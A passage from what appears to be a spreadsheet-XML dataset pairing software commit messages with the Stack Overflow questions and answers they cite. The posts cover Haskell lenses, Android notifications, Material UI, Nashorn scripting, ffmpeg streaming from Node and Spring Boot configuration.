All of these seem okay, but I struggle with having an explosion of possible things that the business could need.  Just continuing with the purchase order example, what if some items need a color?  Some need a hazardous materials declaration id?  Some need a simple "this is rare, are you sure?".  The list could go on and on.  It feels like deciding you need this info definitely belongs in the domain layer.  In a non-layered app, you'd just pop up a dialog and get what you need.  How do you do it in a properly layered application?
</t>
  </si>
  <si>
    <t>C365</t>
  </si>
  <si>
    <t>Volumes (bind mounts) support
Volume declarations in `Hexfile.yml` are changed to short syntax, that
way we can reuse `FromJSON` instances for `Bind` declared in `docker-hs`
Lens-style "update*" functions are inspired by
https://stackoverflow.com/a/47729546</t>
  </si>
  <si>
    <t>One way of generalizing
incrementPersonCounter
is to abstract over the modification function:
modifyPersonCounter :: (Int -&gt; Int) -&gt; Person -&gt; Person
modifyPersonCounter f p = (\c -&gt; p { counter = c}) $ f (counter p)
In fact, a common pattern is to abstract as well over the
effect
we want to perform in the field:
counterLens :: forall f. Functor f =&gt; (Int -&gt; f Int) -&gt; (Person -&gt; f Person)
counterLens f p = (\c -&gt; p { counter = c }) &lt;$&gt; f (counter p)
For example, we might want to read the counter increase from console, or from a database (both
IO
effects).
We can give a
synonym
to the type of functions that, given a (possibly effectful) way of changing a field, return a function that transforms the whole record:
type Lens' a b = forall f. Functor f =&gt; (b -&gt; f b) -&gt; (a -&gt; f a)
To modify a record
purely
, now we need an auxiliary function we can call
over
, which only needs to be defined once:
over :: Lens' a b -&gt; (b -&gt; b) -&gt; a -&gt; a
over l f p = runIdentity $ l (Identity . f) p
For example:
*Main&gt; over counterLens (+1) (Person "foo" 40)
Person {name = "foo", counter = 41}
We have abstracted over the modification function and its possible effects, but we still need to define these "lenses" for each field, which is annoying. In practice, people use
Template Haskell
to define them automatically and avoid boilerplate.
But what if we wanted a
single
function that let us specify the name of the field? That is, sadly, more complex. You need a way to pass type-level strings as arguments, and a
multi-parameter type class
that encodes the relationship between a field's name, the type of the record, and the type of the field. There are
some packages
which do that (again, with Template Haskell help for the boilerplate) but to my knowledge they are not widely used.
The main library for lenses is called
lens
, and there is also
microlens
, an alternative with a lighter dependency footprint. They are interoperable: lenses defined using one library work with the other.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently runing Python 3.11.6 on windows, my script runs fine up to the point when it's starts to use [scikit-learn] version 1.5.2 I got this exit code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Process finished with exit code -1066598274 (0xC06D007E)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However if I use new release of scikit 1.6.2 I got this error instead.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File &amp;quot;C:\Users\Konrad Kij\Documents\MSC_Apex Workspace\Macros\RSM_Projekt_aproksymacja.py&amp;quot;, line 8, in &amp;lt;module&amp;gt;
    from sklearn.linear_model import LinearRegression
  File &amp;quot;C:\Program Files\MSC.Software\MSC Apex\2024-011290\python3\Lib\site-packages\sklearn\linear_model__init__.py&amp;quot;, line 10, in &amp;lt;module&amp;gt;
    from ._base import LinearRegression
  File &amp;quot;C:\Program Files\MSC.Software\MSC Apex\2024-011290\python3\Lib\site-packages\sklearn\linear_model_base.py&amp;quot;, line 19, in &amp;lt;module&amp;gt;
    from ..base import (
ModuleNotFoundError: No module named 'sklearn.base'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I run same script on Python 3.13.2 everything runs fine.
I tried isntaling the scikit-learn with pip and with the pycharm python packages instaler.
Worth mentiong my 3.11.6 python is stored in the program files on main drive with OS&lt;/p&gt;
&lt;p&gt;This whole script that I'm using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from fontTools.misc.cython import returns
from win32com.client import Dispatch
import win32com.client as wc
import numpy as np
from pyDOE3 import *
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import random
from scipy.optimize import minimize, NonlinearConstraint
from shapely.geometry import Polygon, Point
from scipy.spatial import ConvexHull
from sklearn.metrics import r2_score
def Geometry_generator(rib_count,Width,Name):
    # WÅ‚Ä…cznie invenotora
    app = Dispatch(&amp;quot;Inventor.Application&amp;quot;)
    app.Visible = True  # wÅ‚Ä…czenie invenotra jako aktywnÄ… aplikacje
    # Å›cieÅ¼ka do pliku .ipt
    file_path = r&amp;quot;C:\Users\User\Documents\Inventor\ASME2025\ZÅ‚oÅ¼enie\Baseplate.ipt&amp;quot;
    try:
        # otwarcie pliku
        document = app.Documents.Open(file_path)
        print(f&amp;quot;File '{file_path}' has been opened successfully.&amp;quot;)
    except Exception as e:
        print(f&amp;quot;Failed to open the file. Error: {e}&amp;quot;)
    # aktualizacja parametrÃ³w
    doc = app.ActiveDocument
    parameters = doc.ComponentDefinition.Parameters
    parameters.Item(&amp;quot;Width&amp;quot;).Value = Width
    parameters.Item(&amp;quot;N1&amp;quot;).Value = rib_count
    app.ActiveDocument.Update()
    app.ActiveDocument.Save()
    # otwarcie zÅ‚oÅ¼enia
    file_path = r&amp;quot;C:\Users\User\Documents\Inventor\ASME2025\ZÅ‚oÅ¼enie\Radiator Benchmark.iam&amp;quot;
    try:
        # otwarcie pliku
        document = app.Documents.Open(file_path)
        print(f&amp;quot;File '{file_path}' has been opened successfully.&amp;quot;)
    except Exception as e:
        print(f&amp;quot;Failed to open the file. Error: {e}&amp;quot;)
    doc = app.ActiveDocument
    app.ActiveDocument.Update()
    app.ActiveDocument.Save()
    X_TAddIn = app.ApplicationAddIns.ItemById(&amp;quot;{90AF7F40-0C01-11D5-8E83-0010B541CD80}&amp;quot;)
    doc = app.ActiveDocument
    oContext = app.TransientObjects.CreateTranslationContext()
    oContext.Type =  13059
    oOptions = app.TransientObjects.CreateNameValueMap()
    oDataMedium = app.TransientObjects.CreateDataMedium()
    Doc_name_input = Name
    oDataMedium.FileName = ('C:\\Users\\User\\Documents\\Inventor\\ASME2025\\Projekt\\{name}.step'.format(name=Doc_name_input))
    X_TAddIn.SaveCopyAs(doc, oContext, oOptions, oDataMedium)
    return
Name = [&amp;quot;SRM_1&amp;quot;,&amp;quot;SRM_2&amp;quot;,&amp;quot;SRM_3&amp;quot;,&amp;quot;SRM_4&amp;quot;,&amp;quot;SRM_5&amp;quot;,&amp;quot;SRM_6&amp;quot;,&amp;quot;SRM_7&amp;quot;,&amp;quot;SRM_8&amp;quot;,&amp;quot;SRM_9&amp;quot;,&amp;quot;SRM_10&amp;quot;,&amp;quot;SRM_11&amp;quot;,&amp;quot;SRM_12&amp;quot;,&amp;quot;SRM_13&amp;quot;,&amp;quot;SRM_14&amp;quot;,&amp;quot;SRM_15&amp;quot;,&amp;quot;SRM_16&amp;quot;]
N1_W_min_values  = ([25,0.05])
N1_W_max_values = ([55,0.1])
Figure_of_Merit = ([0.47342,0.57480,0.59402,0.54229,0.58155,0.58155,0.58155,0.58155,0.48778,0.61006,0.53702,0.61893,0.58155,0.58155,0.58155,0.58155])
print(ccdesign(2,face='ccf'))  #Macierz eksperymentu uÅ¼yta w tym przypadku
modele = [[25,0.05],
                 [25,0.1],
                 [55,0.05],
                 [38,0.1],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [25,0.075],
                 [45,0.075],
                 [40,0.05],
                 [38,0.1],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075]]
modele = np.array(modele)
print(len(modele))
# Generowanie geometri sprawdzanych wymiennikÃ³w
# i in range(modele.shape[0]):
#     Geometry_generator(rib_count=modele[i,0],Width=modele[i,1],Name=Name[i])
# funkcja skalujÄ…ca liniowo
def Linear_Scaling(value, min_val, average_val, max_val):
    if value &amp;lt; 0.0:  # Dla wartoÅ›ci ujemnych
        return average_val + (value * (average_val - min_val))
    else:  # Dla wartoÅ›ci dodatnich
        return average_val + (value * (max_val - average_val))
#  Funkcja generujaca powierzchniÄ™ odpowiedzi i jej maksimum
def SRM_Screaning(Factors_count,min,max):
    SRM_Array = [[25,0.05],
                 [25,0.1],
                 [55,0.05],
                 [38,0.1],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [25,0.075],
                 [45,0.075],
                 [40,0.05],
                 [38,0.1],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075],
                 [40,0.075]]
    SRM_Array = np.array(SRM_Array)
    print(SRM_Array)
    FOM = Figure_of_Merit
    print(FOM)
    # tworzenie funkcji kwadratowej
    poly = PolynomialFeatures(degree=2)
    X_poly = poly.fit_transform(SRM_Array)
    # dopasowywanie powierzchni do punktÃ³w eksperymentalnych
    model = LinearRegression()
    model.fit(X_poly, FOM)
    # zakres zmiennych
    x1_range = np.linspace(min[0], max[0], 50)
    x2_range = np.linspace(min[1], max[1], 50)
    x1_grid, x2_grid = np.meshgrid(x1_range, x2_range)
    # transformacja siatki dla modelu
    X_grid = np.column_stack((x1_grid.ravel(), x2_grid.ravel()))
    X_grid_poly = poly.transform(X_grid)
    # Przewidziana odpowiedÅº
    FOM_grid = model.predict(X_grid_poly).reshape(x1_grid.shape)
    fig = plt.figure(figsize=(10, 7))
    plt.subplot(1,2,1)
    # WypeÅ‚nione kontury
    contour = plt.contourf(x1_grid, x2_grid, FOM_grid, levels=20, cmap='viridis')
    plt.colorbar(contour, label='OdpowiedÅº (y)')  # Pasek kolorÃ³w
    # Poziomice (linie konturowe)
    plt.contour(x1_grid, x2_grid, FOM_grid, levels=20, colors='black', linewidths=0.5)
    # punkty pomiarowe
    plt.scatter(SRM_Array[:,0], SRM_Array[:,1], color='red', label='Dane eksperymentalne')
    # Opis osi
    plt.xlabel('IloÅ›Ä‡ kanaÅ‚Ã³w [-]')
    plt.ylabel('SzerokoÅ›Ä‡ kanaÅ‚Ã³w [mm]')
    plt.title('Powierzchnia odpowiedzi wykres konturowy')
    ax = plt.subplot(1,2,2, projection='3d')
    # Powierzchnia
    ax.plot_surface(x1_grid, x2_grid, FOM_grid, cmap='viridis', alpha=0.8)
    # WartoÅ›ci doÅ›wiadzczalne
    ax.scatter(SRM_Array[:, 0], SRM_Array[:, 1], FOM, color='r', label='Dane eksperymentalne')
    # Opis osi
    ax.set_xlabel('IloÅ›Ä‡ kanaÅ‚Ã³w [-]')
    ax.set_ylabel('SzerokoÅ›Ä‡ kanaÅ‚Ã³w [mm]')
    ax.set_zlabel('FOM-Figure of Merit')
    ax.set_title('Powierzchnia odpowiedzi')
    plt.legend()
    # Wyznaczenie maksimum lokalnego funkcji
    # Tworzymy otoczkÄ™ wypukÅ‚Ä… z punktÃ³w SRM_Array
    hull = ConvexHull(SRM_Array)
    # Funkcja powierzchni oparta na regresji
    def surface_area(coords):
        X_poly_single = poly.transform([coords])
        return -model.predict(X_poly_single)[0]  # Negacja, by znaleÅºÄ‡ maksimum
    # Funkcja ograniczenia dla punktu (musi byÄ‡ wewnÄ…trz otoczki wypukÅ‚ej)
    def constraint_fn(coords):
        new_point = np.array(coords)
        return hull.equations[:, :-1] @ new_point + hull.equations[:, -1]
    # Tworzymy ograniczenie nieliniowe (wszystkie wartoÅ›ci muszÄ… byÄ‡ &amp;lt;= 0)
    nonlinear_constraint = NonlinearConstraint(constraint_fn, -np.inf, 0)
    # Punkt poczÄ…tkowy optymalizacji (np. Å›rodek obszaru ograniczeÅ„)
    initial_guess = np.mean(SRM_Array, axis=0)
    # Wykonanie optymalizacji z ograniczeniem nieliniowym
    result = minimize(surface_area, initial_guess, constraints=[nonlinear_constraint])
    # WartoÅ›Ä‡ maksymalna i jej lokalizacja
    if result.success:
        max_value = -result.fun
        max_location = result.x
        print(f&amp;quot;Maksymalna wartoÅ›Ä‡: {max_value}&amp;quot;)
        print(f&amp;quot;Lokalizacja maksimum: {max_location}&amp;quot;)
    else:
        print(&amp;quot;Optymalizacja siÄ™ nie powiodÅ‚a.&amp;quot;)
        return
    # Wizualizacja powierzchni odpowiedzi
    x1_range = np.linspace(min[0], max[0], 50)
    x2_range = np.linspace(min[1], max[1], 50)
    x1_grid, x2_grid = np.meshgrid(x1_range, x2_range)
    X_grid = np.column_stack((x1_grid.ravel(), x2_grid.ravel()))
    X_grid_poly = poly.transform(X_grid)
    FOM_grid = model.predict(X_grid_poly).reshape(x1_grid.shape)
    fig = plt.figure(figsize=(10, 7))
    plt.subplot(1, 2, 1)
    # WypeÅ‚nione kontury
    contour = plt.contourf(x1_grid, x2_grid, FOM_grid, levels=20, cmap='viridis')
    plt.colorbar(contour, label='OdpowiedÅº (y)')  # Pasek kolorÃ³w
    # Poziomice (linie konturowe)
    plt.contour(x1_grid, x2_grid, FOM_grid, levels=20, colors='black', linewidths=0.5)
    # Punkty danych
    plt.scatter(SRM_Array[:, 0], SRM_Array[:, 1], color='red', label='Dane eksperymentalne')
    # Lokalizacja maksimum
    plt.scatter(*max_location, color='gold', s=100, label='Maksimum', edgecolors='black')
    # Granice obszaru
    for i, simplex in enumerate(hull.simplices):
        plt.plot(SRM_Array[simplex, 0], SRM_Array[simplex, 1], linestyle='-',linewidth=2, color='blue')
    # Opis osi
    plt.xlabel('IloÅ›Ä‡ kanaÅ‚Ã³w [-]')
    plt.ylabel('SzerokoÅ›Ä‡ kanaÅ‚Ã³w [mm]')
    plt.title('Powierzchnia odpowiedzi wykres konturowy')
    plt.legend()
    ax = plt.subplot(1, 2, 2, projection='3d')
    # Powierzchnia
    ax.plot_surface(x1_grid, x2_grid, FOM_grid, cmap='viridis', alpha=0.8)
    # Punkty FOM
    ax.scatter(SRM_Array[:, 0], SRM_Array[:, 1], FOM, color='r', label='Dane eksperymentalne')
    # Lokalizacja maksimum
    ax.scatter(*max_location, max_value, color='gold', s=100, label='Maksimum', edgecolors='black')
    # Opis Osi
    ax.set_xlabel('IloÅ›Ä‡ kanaÅ‚Ã³w [-]')
    ax.set_ylabel('SzerokoÅ›Ä‡ kanaÅ‚Ã³w [mm]')
    ax.set_zlabel('FOM-Figure of Merit')
    ax.set_title('Powierzchnia odpowiedzi')
    ax.legend()
    plt.legend()
    plt.show()
    # Rzeczywiste dane
    y_true = FOM  # WartoÅ›ci rzeczywiste
    y_pred = model.predict(X_poly)
    # Liczba obserwacji i liczba zmiennych niezaleÅ¼nych
    n = len(y_true)  # Liczba obserwacji
    p = X_poly.shape[1] - 1  # Liczba zmiennych niezaleÅ¼nych (pomijajÄ…c intercept)
    r2 = r2_score(y_true, y_pred)
    # Obliczenie skorygowanego R^2
    r2_adj = 1 - (1 - r2) * (n - 1) / (n - p - 1)
    print(f&amp;quot;R^2: {r2:.4f}&amp;quot;)
    print(f&amp;quot;Skorygowany R^2: {r2_adj:.4f}&amp;quot;)
    return
# WywoÅ‚anie Funkcji
SRM_Screaning(2,min=N1_W_min_values,max=N1_W_max_values)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't know how to fix this and I can't switch python version because the 3.11.6 version is provided with the software that script must run in.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C366</t>
  </si>
  <si>
    <t>Fix notifications to avoid flicker on KitKat
On KitKat you need to reuse the same notification builder when
generating a notification that's intended to replace a previous
one. See:
https://stackoverflow.com/questions/6406730/updating-an-ongoing-notification-quietly
PiperOrigin-RevId: 232503682</t>
  </si>
  <si>
    <t>You should update existing notification as per the
docs
.</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, I will shortly be starting down the path of windows mobile development. I know nothing about the subject really and I am looking for people with experience to let me know of any gottchas you may know of. 
Right now I dont even have a breif of what is requied but the assumption is that the application will be very little more than a bunch of CRUD forms for updating data. The only other requirment knowladge I have is that the application will need to support offline storage when there is no signal avaliable. This in turn will obviously require some kind of syncronization when signal returns. 
My initial thoughts are that the application will primarily be a front end to interact with a web service layer. Im assuming that WCF will be an appropriate technology for building these services? I also thought that SQL Server CE would be a good route to go down with regards to the offline storage issues. 
Any knowlage that you feel is useful within this domain would be appreciated. Advice, links, books anything appreciated.  
EDIT: It has been noted that there are two ways to go with off-line synchronization. To either use some form of message queuing or to use SQL synchronization tools. Could anyone offer a good comparison and introduction to these?
EDIT 2: After a little more digging I get the impression that there are basically 3 different approaches I can use here:
Emmbeded Database to query against then syncronization online, when able
MSMQ along with .NET remoting 
WCF with ExchangeWebServiceMailTransport bindings using Exchange Server.
Now, there has been a nice few points raised on the first issue, and I think I understand at some level the issues I would face. But I'd like to get a little more information regarding MSMQ implementations and using WCFs new bindings. 
</t>
  </si>
  <si>
    <t>C367</t>
  </si>
  <si>
    <t>span component must be used for list
https://stackoverflow.com/questions/41928567/div-cannot-appear-as-a-descendant-of-p</t>
  </si>
  <si>
    <t>If this error occurs while using Material UI
&lt;Typography&gt;
https://material-ui.com/api/typography/
, then you can easily change the
&lt;p&gt;
to a
&lt;span&gt;
by changing the value of the
component
attribute of the
&lt;Typography&gt;
element :
&lt;Typography component={'span'} variant={'body2'}&gt;
According to the typography docs:
component : The component used for the root node. Either a string to use a DOM element or a component. By default, it maps the variant to a good default headline component.
So Typography is picking
&lt;p&gt;
as a sensible default, which you can change. May come with side effects ... worked for me.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm attempting to put together a basic test framework for a number of JS scripts that I've been provided. These all run on nashorn (JDK 11) without issue in their original habitat. I'm attempting to load and run the scripts myself, and execute tests by comparing input and output.&lt;/p&gt;
&lt;p&gt;The issue I'm having is with the format of the scripts. While I know they can be run via Nashorn, I don't have access to the source code that does it, and I'm having a problem grabbing references to all of the functions/methods I need. The source files follow this pattern:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(function () {
    &amp;quot;use strict&amp;quot;;
    print(&amp;quot;Canary: Here I am inside the root level function&amp;quot;);
    function writeLogEntry(message) {
        echo(message);
    }
    return function main(data) {
        print(&amp;quot;Canary: Here I am inside main&amp;quot;);
        writeLogEntry(data.someVitalStat());
        return true;
    };
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I do not have the option to change the source files - I have to use them as-is. The issue has been with getting a reference to functions other than main. I was able to get a ref for main in the following way, which required two passes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String scriptTextRaw = new String(Files.readAllBytes(Paths.get(location)), StandardCharsets.UTF_8);
var ee = new ScriptEngineManager().getEngineByName(&amp;quot;Nashorn&amp;quot;);
scriptTextRaw = &amp;quot;var mainfunc = &amp;quot; + scriptTextRaw;
ee.eval(scriptTextRaw);
Object mainRef = ee.get(&amp;quot;mainfunc&amp;quot;);
// Second eval pass
ee.eval(mainRef.toString());
var mainInvocable = (ScriptObjectMirror)ee.get(&amp;quot;main&amp;quot;);
// Invoke main function
Object mainResult = mainInvocable.call(myDataObject);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm open to better ways to get that main reference. However, the bigger problem is that the anonymous functions encapsulated in the script aren't accessible. Running the above code, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception in thread &amp;quot;main&amp;quot; &amp;lt;eval&amp;gt;:3 ReferenceError: &amp;quot;writeLogEntry&amp;quot; is not defined. 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried a few things, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object writeLogEntryRef = (ScriptObjectMirror)ee.get(&amp;quot;writeLogEntry&amp;quot;); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(Both after the first and second eval pass)&lt;/p&gt;
&lt;p&gt;But this is unsuccessful. I've also paused the program in the debugger after each eval pass to examine the returned object, but I don't find any references to the other methods.&lt;/p&gt;
&lt;p&gt;Can anyone suggest an approach to parsing and running a script formatted like this one? All input is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C368</t>
  </si>
  <si>
    <t>Fix crash with TabLayouts and their tabs
ViewBinding crashes when TabLayout items have IDs, because
these are not real views - they are just dummy views used to
define tabs in XML.
More info: https://stackoverflow.com/questions/66320075/missing-required-view-with-id-with-view-binding-and-navigation-component/66325932#66325932
After that Tabs caused endless loop, because they were inflating themselves
using `...Binding.inflate`. Since they are their own views which also use
XML, `...Binging.bind` should be used in `onFinishInflate`.</t>
  </si>
  <si>
    <t>The problem that you are facing is that
TabItem
is just a dummy view. Looking in the source code you can see that
/**
 * TabItem is a special 'view' which allows you to declare tab items for a {@link TabLayout} within
 * a layout. This view is not actually added to TabLayout, it is just a dummy which allows setting
 * of a tab items's text, icon and custom layout. See TabLayout for more information on how to use
 * it.
 *
 * @attr ref com.google.android.material.R.styleable#TabItem_android_icon
 * @attr ref com.google.android.material.R.styleable#TabItem_android_text
 * @attr ref com.google.android.material.R.styleable#TabItem_android_layout
 * @see TabLayout
 */
//TODO(b/76413401): make class final after the widget migration
public class TabItem extends View {
So the ViewBinding fails to find the
Tab
with the ID that you have specified as this is not added to the view hierarchy.
To fix this you have to remove the
id
from the
TabItem
. If you need to access
Tab
you can use the following code.
// to access first tab
binding.tabs.getTabAt(0)</t>
  </si>
  <si>
    <t xml:space="preserve">What is the best description of [external-link] to pitch it to an organization?
It's created by [external-link], the creator of the [external-link].
Is it really the successor to MVC or just another pattern? And what are its pros and cons?
</t>
  </si>
  <si>
    <t>C369</t>
  </si>
  <si>
    <t>Fixing crash when starting component activity
Issue #6. Via https://stackoverflow.com/a/50833599</t>
  </si>
  <si>
    <t>if your android version is below Android - 6 then you need to add this line otherwise it will work above Android - 6.
...
Intent i = new Intent(this, Wakeup.class);
i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
...</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sorry for my english! :D&lt;/p&gt;
&lt;p&gt;I'm trying to make a live video stream from my webcam with ffmpeg using Node.&lt;/p&gt;
&lt;p&gt;I get the images or frames from ffmpeg via pipe1 on the stdout event and send them via a socket-io client to my angular app to play the stream.&lt;/p&gt;
&lt;p&gt;So far the stream starts fine and my angular app can play it fine, but after a certain time (8 minutes or so) ffmpeg stops sending data and the stream in my angular app stops and if I want to start the webcam again it's not possible anymore because it's apparently occupied by another process. I've been trying to figure out what's going on and what I've noticed is that the ffmpeg process just stops and the process is no longer visible with the &lt;code&gt;top&lt;/code&gt; command (ubuntu), but the child process in node still shows a ffmpeg process as if it were a zombie process.&lt;/p&gt;
&lt;p&gt;I've tried running ffmpeg from the terminal to save an mp4 file with the stream and in that case there is no problem, the recording doesn't stop even using pipe1. Only when I run ffmpeg from my Node app, the error occurs.&lt;/p&gt;
&lt;p&gt;Does anyone have any idea what could be going on?&lt;/p&gt;
&lt;p&gt;This command is the one that is executed to send the data through pipe1 both from node and from the terminal but it only stops in Node&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ffmpeg -f v4l2 -input_format mjpeg -video_size 800x600 -i /dev/video0 -q:v 4 -f image2pipe pipe1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The same thing happens when saving an mp4 video only in Node it fails&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ffmpeg -f v4l2 -input_format mjpeg -video_size 800x600 -i /dev/video0 -q:v 4 video.mp4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is my function that starts the streaming&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export const startCamera = () =&amp;gt; {
    logger.info('Starting camera ', cameraName);
    const inputFormat = process.platform === 'win32' ? 'dshow' : 'v4l2';
    const ffmpegArgs = [
        '-f', inputFormat, // Formato de entrada segÃºn la plataforma
    ];
    if (process.platform === 'linux') {
        ffmpegArgs.push(
            '-input_format', 'mjpeg',  // Especificar el formato antes de video_size
            '-video_size', '800x600',  // TamaÃ±o de la imagen
        );
    }
    ffmpegArgs.push(
        '-i', cameraName,    // Dispositivo de entrada
        '-vf', 'fps=15',     // Fotogramas por segundo
        '-q:v', '10',        // Calidad de video
        '-f', 'image2pipe',  // Formato de salida
        'pipe:1'             // Salida por stdout
    );
    try {
        logger.info('FFmpeg command: ffmpeg', ffmpegArgs.join(' '));
        ffmpeg = spawn('ffmpeg', ffmpegArgs);
        let cameraOpen = false;
        // Enviar los datos del fotograma a travÃ©s del WebSocket
        ffmpeg.stdout.on('data', (chunk) =&amp;gt; {
            logger.debug(`Sending chunk of ${chunk.length} bytes`);
            if (!cameraOpen) {
                cameraOpen = true;
                serialConnection.connect();
                logger.info('Camera started!!');
            }
            if (streamWS.isActive()) {
                streamWS.send(chunk);
            }
        });
        // Manejo de errores
        ffmpeg.stderr.on('error', (data) =&amp;gt; {
            logger.error('FFmpeg Error:', data.toString());
        });
        ffmpeg.on('close', async () =&amp;gt; {
            logger.info('Camera closed....', cameraName);
            if (!cameraOpen) {
                await commandWS.send(
                    {
                        command: COMMANDS.START_STREAM,
                        isError: true,
                        response: `Error al intentar iniciar la camara ${cameraName}, verificar que la camara se encuentre bien conectada.`,
                    },
                    COMMANDS_EVENTS.ROBOT_RESPONSE
                );
            }
            cameraOpen = false;
            await serialConnection.close();
            stopCamera();
            await streamWS.disconnectWS();
        });
    } catch (e) {
        logger.error('Error tryng to start the camera...', e);
    }
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C37</t>
  </si>
  <si>
    <t xml:space="preserve"> [expo-notifications] Add NotificationChannelsManager (#6842)
#Why
`NotificationChannelsManager` singleton module will be the manager of notification channels — modules should proxy any changes to channels through it. (There are no modules allowing to create, modify or delete notification channels at the moment, so the only thing this module does is providing a fallback notification channel — a channel `expo-notifications` creates for notifications not assigned to any other channel. It's a rather common practice — [FCM does it too](https://stackoverflow.com/a/45930522).)</t>
  </si>
  <si>
    <t>The ID for that channel is fcm_fallback_notification_channel. The firebase-messaging library creates it internally.
https://github.com/firebase/firebase-android-sdk/blob/076c26db27dd54d809fb2ccff8593b64fb3db043/firebase-messaging/src/main/java/com/google/firebase/messaging/CommonNotificationBuilder.java#L66</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have simple Spring Boot application:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@SpringBootApplication
@EnableConfigurationProperties(DemoApplication.User.class)
public class DemoApplication {
    @Autowired
    User user;
    public static void main(String[] args) {
        SpringApplication.run(DemoApplication.class, args);
    }
    @ConfigurationProperties(&amp;quot;user&amp;quot;)
    record User(String name, int age) {}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's application.properties:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;user.name=Test
user.age=10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everything works fine and property values from application.properties are mapped correctly. Then I added new constructor to User record:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@ConfigurationProperties(&amp;quot;user&amp;quot;)
    record User(String name, int age) {
        public User(String name) {
            this(name, 0);
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and immediately got an error on startup:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Caused by: java.lang.NoSuchMethodException: com.example.demo.DemoApplication$User.&amp;lt;init&amp;gt;()
    at java.base/java.lang.Class.getConstructor0(Class.java:3833) ~[na:na]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I assume that Spring Boot is unable to pick constructor because there are two constructors for User. But how to specify that I want to use original constructor for object creation (String name, int age) ? There is @ConstructorBinding annotation but it can't be applied to class/record.&lt;/p&gt;
&lt;p&gt;Spring Boot: 3.4.2&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C370</t>
  </si>
  <si>
    <t>fix max component budget issue
https://stackoverflow.com/questions/53995948/warning-in-budgets-maximum-exceeded-for-initial/53995996</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking into building an authentication in my ASP.NET application with the following requirements.
A user has exactly one Role (i.e. Admin, SalesManager, Sales, ....)
A role has a set of permissions to CRUD access a subset of existing objects. I.e.
"Sales has CREAD, READ, WRITE permission on object type "Products" but not DELETE"
Somehow I like the permissions to be in a hierarchy with inheritance so that I for i.e. Admin don't need to specify all available objects. 
The system must quickly be able to answer the question "Does user X have permission to do Y to object Z"
All database managed (MSSQL), implemented in C#/ASP.NET
I would like to get feedback on these requirements? Any ideas how to implement this using ASP.NET framework(as much as possible)? (However, I'm also interested to know how this can be achieved without Memberships)
</t>
  </si>
  <si>
    <t>C371</t>
  </si>
  <si>
    <t>fix(virtual-background) use a DOM element for storing the image
THis will reuse the previously cached image and obey the base href.
Ref:
https://stackoverflow.com/questions/6241716/is-there-a-difference-between-new-image-and-document-createelementimg</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Screenshot&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/fjPl9F6t.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/fjPl9F6t.png" alt="sample" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I am trying to count how many values in &lt;code&gt;column C&lt;/code&gt; match &lt;code&gt;column B&lt;/code&gt; based on each category in &lt;code&gt;column J&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt; =COUNTIFS(Scantron!$J2:$J10,K2,Scantron!C$2:C$10,Scantron!$B$2:$B$10)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is the current code I have for &lt;code&gt;&amp;quot;Language&amp;quot;&lt;/code&gt;, but it is returning &lt;code&gt;0&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I tried it with different data and different columns but it still returns &lt;code&gt;0&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C372</t>
  </si>
  <si>
    <t>Update part5b.md
avoid using "ref" to avoid the "Function components cannot be given refs" warning.
https://stackoverflow.com/questions/56484686/how-do-i-avoid-function-components-cannot-be-given-refs-when-using-react-route</t>
  </si>
  <si>
    <t>Just give it as innerRef,
// Client.js
&lt;Input innerRef={inputRef} /&gt;
Use it as ref.
// Input.js
